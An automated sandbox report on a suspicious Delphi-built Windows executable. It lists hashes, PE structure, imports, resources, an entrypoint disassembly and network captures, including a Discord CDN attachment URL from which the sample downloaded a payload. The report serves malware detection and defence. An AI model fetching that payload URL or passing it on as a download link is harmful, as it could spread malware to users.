                                          Preview: ~)........@.00..............................................2.....P.:.R.2..R__#7...?A..A....C.1..A.=.=3.A.=d.>..h.........................................................................................................................................v...2..J-...........].<2.J.?2........gC2......O2...........................................2..................................o2..@...2..A....................2..N..................................................................................t..v....=2......?2..................../.r#r....@...O2......M2........................Z...._2......]2..................3.C....@...o2......]2.................A.;.....N....2......m2..................A.A.....A...2..C...2..............................2......2.........................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Xypgtvglqrlgdvgezyimsisukuqhicz[1]
                                          Process:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          File Type:data
                                          Category:downloaded
                                          Size (bytes):536576
                                          Entropy (8bit):7.589312195933217
                                          Encrypted:false
                                          SSDEEP:12288:YATVsnavJYSyMuglMbn6834oiuE7uL+2psMCDPs:YATVtyJMFMbn68oo7E7ui2psdU
                                          MD5:04409EA53817D75CD40FC7653592D001
                                          SHA1:4DC7DD23E4A02D6BFF089BAC32285CD8C12F4250
                                          SHA-256:8F4220EF61F0352918F5DDA825014FA67C342A9C2864DEF4E0DCE8FF23819EEE
                                          SHA-512:FF1DCA551C9D4D26D34A3C089E8BD008FD0C277D3F834AC8D32E8FD5620403A4CB9B829E9BC243B80646281B084645C25FC60AA76A88A6E12C2B7681E0E99562
                                          Malicious:false
                                          IE Cache URL:https://cdn.discordapp.com/attachments/720918485122940978/850158270907678730/Xypgtvglqrlgdvgezyimsisukuqhicz
                                          Preview: ~)........@.00..............................................2.....P.:.R.2..R__#7...?A..A....C.1..A.=.=3.A.=d.>..h.........................................................................................................................................v...2..J-...........].<2.J.?2........gC2......O2...........................................2..................................o2..@...2..A....................2..N..................................................................................t..v....=2......?2..................../.r#r....@...O2......M2........................Z...._2......]2..................3.C....@...o2......]2.................A.;.....N....2......m2..................A.A.....A...2..C...2..............................2......2.........................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):6.950419723768229
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.24%
                                          • InstallShield setup (43055/19) 0.43%
                                          • Win32 Executable Delphi generic (14689/80) 0.15%
                                          • Windows Screen Saver (13104/52) 0.13%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                          File name:V8IB839cvz.exe
                                          File size:690178
                                          MD5:10d42f55d89b6fd42404e470e68f1996
                                          SHA1:3b9787bbfaae456fe082db8e2e61c70c5fb45328
                                          SHA256:b84a345efddfa5a852c3e3c5c2c97dab1a6f4643906d80c0c8cafa1e25247326
                                          SHA512:13403037fadbca2f2df76946d21eed91aff9418a24ed1ce87c667447c352cd9ec50cdbfda9d64ee51fbd879fbab3610dafbb12d3272332b16bcd8736395b31ce
                                          SSDEEP:12288:4wZeGjiyhybwk6VAn0+A2NUj4pfIMNFYoOOikh4AOpbAF++n/tq:4sjhyZn4VuIMz8AAbAl/tq
                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                          File Icon

                                          Icon Hash:0064cacaaac80788

                                          Static PE Info

                                          General

                                          Entrypoint:0x45dc1c
                                          Entrypoint Section:CODE
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                          DLL Characteristics:
                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:c13589351b888eacb104575a16a88b27

                                          Entrypoint Preview

                                          Instruction
                                          push ebp
                                          mov ebp, esp
                                          add esp, FFFFFFF0h
                                          mov eax, 0045D9C4h
                                          call 00007FEE6CE70F7Dh
                                          mov eax, dword ptr [0045F0F0h]
                                          mov eax, dword ptr [eax]
                                          call 00007FEE6CEBF6B5h
                                          mov ecx, dword ptr [0045F1E4h]
                                          mov eax, dword ptr [0045F0F0h]
                                          mov eax, dword ptr [eax]
                                          mov edx, dword ptr [0045D55Ch]
                                          call 00007FEE6CEBF6B5h
                                          mov eax, dword ptr [0045F0F0h]
                                          mov eax, dword ptr [eax]
                                          mov byte ptr [eax+5Bh], 00000000h
                                          mov eax, dword ptr [0045F0F0h]
                                          mov eax, dword ptr [eax]
                                          call 00007FEE6CEBF71Eh
                                          call 00007FEE6CE6EBCDh
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x610000x22e8.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x411f1.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000x6980.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x650000x18.rdata
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          CODE0x10000x5cc6c0x5ce00False0.528831594886data6.53885536646IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          DATA0x5e0000x12800x1400False0.4234375data3.90267388987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          BSS0x600000xd710x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .idata0x610000x22e80x2400False0.359049479167data4.93636797538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .tls0x640000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .rdata0x650000x180x200False0.05078125data0.206920017787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                          .reloc0x660000x69800x6a00False0.634986733491data6.68626622134IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                          .rsrc0x6d0000x411f10x41200False0.529386846209data6.78044301186IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_BITMAP0x6d6740x1d0data
                                          RT_BITMAP0x6d8440x1e4data
                                          RT_BITMAP0x6da280x1d0data
                                          RT_BITMAP0x6dbf80x1d0data
                                          RT_BITMAP0x6ddc80x1d0data
                                          RT_BITMAP0x6df980x1d0data
                                          RT_BITMAP0x6e1680x1d0data
                                          RT_BITMAP0x6e3380x1d0data
                                          RT_BITMAP0x6e5080x1d0data
                                          RT_BITMAP0x6e6d80x1d0data
                                          RT_BITMAP0x6e8a80xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                          RT_ICON0x6e9900x988dataEnglishUnited States
                                          RT_DIALOG0x6f3180x52data
                                          RT_STRING0x6f36c0x26cdata
                                          RT_RCDATA0x6f5d80x10data
                                          RT_RCDATA0x6f5e80x2ecdata
                                          RT_RCDATA0x6f8d40xf50Delphi compiled form 'TForm1'
                                          RT_RCDATA0x708240x11aDelphi compiled form 'TForm2'
                                          RT_RCDATA0x709400x146Delphi compiled form 'TForm3'
                                          RT_RCDATA0x70a880x10cffDelphi compiled form 'TForm4'
                                          RT_RCDATA0x817880x141Delphi compiled form 'TForm5'
                                          RT_RCDATA0x818cc0x2c674PC bitmap, Windows 3.x format, 225 x 225 x 4EnglishUnited States
                                          RT_GROUP_ICON0xadf400x14dataEnglishUnited States
                                          None0xadf540x29ddataRomanianRomania

                                          Imports

                                          DLLImport
                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                          user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                          kernel32.dlllstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                                          user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                          kernel32.dllSleep
                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                          ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                          oleaut32.dllGetErrorInfo, SysFreeString
                                          comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                          comdlg32.dllGetSaveFileNameA, GetOpenFileNameA

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          RomanianRomania

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          06/04/21-09:40:38.959441ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jun 4, 2021 09:39:57.218050957 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.262564898 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.268052101 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.334944010 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.379723072 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.388204098 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.388297081 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.388375998 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.388401985 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.461925983 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.504628897 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.505026102 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.505136013 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.522104025 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.564855099 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586134911 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586157084 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586173058 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586184978 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586200953 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586211920 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586229086 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586240053 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586283922 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.586666107 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586683035 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.586750984 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.586769104 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.587277889 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.587305069 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.587810993 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.588371992 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.588399887 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.588514090 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.589490891 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.589515924 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.589610100 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.589622021 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.590625048 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.590650082 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.590735912 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.590747118 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.591744900 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.591770887 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.591828108 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.591840029 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.592016935 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.592026949 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.592864990 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.592889071 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.593094110 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.594032049 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.594057083 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.594161034 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.594177008 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.595105886 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.595154047 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.595601082 CEST49730443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.595674038 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.596261024 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.596287012 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.596381903 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.597383022 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.597409010 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.598481894 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.598506927 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.598551035 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.598568916 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.598679066 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.599602938 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.599723101 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.630860090 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.630896091 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.630976915 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.631361008 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.631391048 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.631433964 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.632111073 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.632488012 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.632520914 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.633518934 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.633591890 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.633624077 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.633676052 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.634728909 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.634762049 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.634826899 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.635891914 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.635926008 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.636374950 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.636998892 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.637042046 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.637072086 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.638139009 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.638170958 CEST44349729162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.638217926 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.638233900 CEST49729443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.639641047 CEST44349730162.159.130.233192.168.2.4
                                          Jun 4, 2021 09:39:57.639751911 CEST49730443192.168.2.4162.159.130.233
                                          Jun 4, 2021 09:39:57.640456915 CEST49730443192.168.2.4162.159.130.233

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jun 4, 2021 09:39:47.727473021 CEST4925753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:47.771238089 CEST53492578.8.8.8192.168.2.4
                                          Jun 4, 2021 09:39:48.525234938 CEST6238953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:48.574261904 CEST53623898.8.8.8192.168.2.4
                                          Jun 4, 2021 09:39:49.486754894 CEST4991053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:49.535496950 CEST53499108.8.8.8192.168.2.4
                                          Jun 4, 2021 09:39:50.494714022 CEST5585453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:50.536011934 CEST53558548.8.8.8192.168.2.4
                                          Jun 4, 2021 09:39:57.147141933 CEST6454953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:57.198767900 CEST53645498.8.8.8192.168.2.4
                                          Jun 4, 2021 09:39:57.574749947 CEST6315353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:57.624927998 CEST53631538.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:00.506942034 CEST5299153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:00.555979013 CEST53529918.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:01.415688038 CEST5370053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:01.457792997 CEST53537008.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:02.315181971 CEST5172653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:02.356365919 CEST53517268.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:03.151670933 CEST5679453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:03.202284098 CEST53567948.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:03.958817959 CEST5653453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:03.999900103 CEST53565348.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:04.839706898 CEST5662753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:04.880892038 CEST53566278.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:05.650723934 CEST5662153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:05.699759960 CEST53566218.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:06.939809084 CEST6311653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:06.982979059 CEST53631168.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:12.372137070 CEST6407853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:12.415651083 CEST53640788.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:13.298985004 CEST6480153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:13.348169088 CEST53648018.8.8.8192.168.2.4
